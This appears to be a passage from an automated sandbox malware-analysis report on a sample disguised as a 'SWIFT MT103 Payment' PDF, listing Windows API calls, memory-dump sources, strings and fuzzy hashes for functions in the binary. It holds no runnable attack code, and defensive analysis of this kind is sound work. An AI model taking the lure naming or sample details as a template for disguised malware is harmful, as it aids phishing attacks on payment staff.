                                                        • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                        • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                        • EndPath.GDI32(?), ref: 004472B0
                                                        • StrokePath.GDI32(?), ref: 004472BE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 2783949968-0
                                                        • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                        • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                        • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                        • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                        APIs
                                                        • __getptd.LIBCMT ref: 00417D1A
                                                          • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                          • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                        • __getptd.LIBCMT ref: 00417D31
                                                        • __amsg_exit.LIBCMT ref: 00417D3F
                                                        • __lock.LIBCMT ref: 00417D4F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                        • String ID:
                                                        • API String ID: 3521780317-0
                                                        • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                        • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                        • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                        • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00471144
                                                        • GetDC.USER32(00000000), ref: 0047114D
                                                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                        • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                        • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                        • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                        • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00471102
                                                        • GetDC.USER32(00000000), ref: 0047110B
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                        • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                        • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                        • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                        • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                        • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                        • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                        • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                        • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                        • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                        • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                          • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                          • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                        • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                        • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                        • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                        APIs
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                          • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                        • __getptd_noexit.LIBCMT ref: 00414080
                                                        • __freeptd.LIBCMT ref: 0041408A
                                                        • ExitThread.KERNEL32 ref: 00414093
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 3182216644-0
                                                        • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                        • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                        • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                        • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower
                                                        • String ID: $8'I
                                                        • API String ID: 2358735015-3608026889
                                                        • Opcode ID: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                        • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                        • Opcode Fuzzy Hash: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                        • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                        APIs
                                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                          • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                          • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 3380330463-3941886329
                                                        • Opcode ID: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                        • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                        • Opcode Fuzzy Hash: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                        • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00409A61
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                        • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                        • String ID: 0vH
                                                        • API String ID: 1143807570-3662162768
                                                        • Opcode ID: d077388c748296aac0e37c8a7f3a2b7f8c0d5e4e2eeb7cf4d11236fdd482c21f
                                                        • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                        • Opcode Fuzzy Hash: d077388c748296aac0e37c8a7f3a2b7f8c0d5e4e2eeb7cf4d11236fdd482c21f
                                                        • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HH$HH
                                                        • API String ID: 0-1787419579
                                                        • Opcode ID: d6191838e98fd11d03648c209846f73e934a5a3a8cd563e055064b994aed395a
                                                        • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                        • Opcode Fuzzy Hash: d6191838e98fd11d03648c209846f73e934a5a3a8cd563e055064b994aed395a
                                                        • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: e36ca25654c0cf42caddd86e6fd18f5eedd64ba5616c69e871b17a641f5051e5
                                                        • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                        • Opcode Fuzzy Hash: e36ca25654c0cf42caddd86e6fd18f5eedd64ba5616c69e871b17a641f5051e5
                                                        • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                        • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                        • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                        • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                        • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                        • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                        • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                        • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                        • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                        • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                        • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                        • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                        • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00474833
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                        • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                        • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                        • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
